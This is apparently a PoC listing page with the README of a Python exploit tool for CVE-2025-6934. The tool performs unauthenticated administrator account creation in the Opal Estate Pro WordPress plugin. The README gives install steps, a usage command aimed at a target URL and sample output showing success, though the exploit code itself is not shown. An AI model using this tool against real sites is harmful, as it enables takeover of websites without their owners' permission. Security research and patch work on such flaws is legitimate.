CVE-2025-6934 PoC — Opal Estate Pro <= 1.7.5 - Unauthenticated Privilege Escalation via 'on_regiser_user'

Source

Associated Vulnerability

Description

CVE-2025-6934 - Exploit WordPress Opal Estate Pro 

Readme

# CVE-2025-6934 Auto Exploit

![Python](https://img.shields.io/badge/Python-3.11-blue)
![Status](https://img.shields.io/badge/Status-POC-orange)
![Author](https://img.shields.io/badge/Author-Rosemary1337-red)

---

## ⚡ Overview

**CVE-2025-6934** is a proof-of-concept (PoC) exploit targeting **WordPress Plugin: Opal Estate Pro ≤ 1.7.5**.  
This exploit demonstrates **unauthenticated administrator account creation**.

> **Disclaimer:** This PoC is for educational purposes only. Do **not** use on systems without permission.

---

## 🛠 Features

- Detect plugin version automatically.
- Retrieve required nonce for registration.
- Create a new administrator account without authentication.
- Colorful console output with status, success, failure, and info messages.
- Works on Python 3.x with minimal dependencies.

---

## ⚙️ Installation

1. Clone the repository:
```bash
git clone https://github.com/Rosemary1337/CVE-2025-6934.git
cd CVE-2025-6934
````

2. Install dependencies:

```bash
pip install -r requirements.txt
```

> Requirements: `requests`, `beautifulsoup4`, `colorama`

---

## 🚀 Usage

```bash
python3 main.py -u <TARGET_URL> -mail <EMAIL> -password <PASSWORD> -user <USERNAME>
```

### Example:

```bash
python3 main.py -u http://site.com/ -mail admin@horsefucker.org -password 3xplo1tI5Fun -user r1337
```

### Arguments

| Flag                       | Description            | Required | Default         |
| -------------------------- | ---------------------- | -------- | --------------- |
| `-u, --url`                | Target site URL        | Yes      | -               |
| `-mail, --newmail`         | Email for new admin    | Yes      | -               |
| `-password, --newpassword` | Password for new admin | Yes      | -               |
| `-user, --username`        | Username for new admin | No       | `administrator` |

---

## 🎨 Output

The console shows:

* Status messages `[•]`
* Success `[✔]`
* Fail `[✖]`
* Info `[i]`

Example:

```
[•] Starting Exploit...
[✔] Nonce Found: xyz123
[✔] Exploit Successful!
    Username : r1337
    Email    : admin@horsefucker.org
    Password : 3xplo1tI5Fun
    Role     : administrator
```
---

## 🔐 Security & Disclaimer

* For **educational & testing purposes only**.
* Do **not** attack websites without explicit permission.
* Use in a controlled lab or authorized penetration test only

---

## 🔗 Connect with Me

I'm an active developer who enjoys building tools and sharing knowledge. You can reach me through:
<p align="left"> <a href="https://github.com/Rosemary1337" target="_blank"> <img src="https://img.shields.io/badge/GitHub-181717?style=for-the-badge&logo=github&logoColor=white"/> </a> <a href="https://t.me/stupidp3rson" target="_blank"> <img src="https://img.shields.io/badge/Telegram-26A5E4?style=for-the-badge&logo=telegram&logoColor=white"/> </a> <a href="https://www.tiktok.com/@justan0therloser" target="_blank"> <img src="https://img.shields.io/badge/TikTok-000000?style=for-the-badge&logo=tiktok&logoColor=white"/> </a> <a href="mailto:rayhanmahardika576@gmail.com" target="_blank"> <img src="https://img.shields.io/badge/Email-8A2BE2?style=for-the-badge&logo=minutemailer&logoColor=white"/> </a> </p> 

File Snapshot

 [4.0K]  /data/pocs/9147b2c237526b514ec366dc25bcd883ee444720
├── [1.0K]  LICENSE
├── [8.7K]  main.bin
├── [ 255]  main.py
├── [3.2K]  README.md
└── [  33]  requirements.txt

0 directories, 5 files

Remarks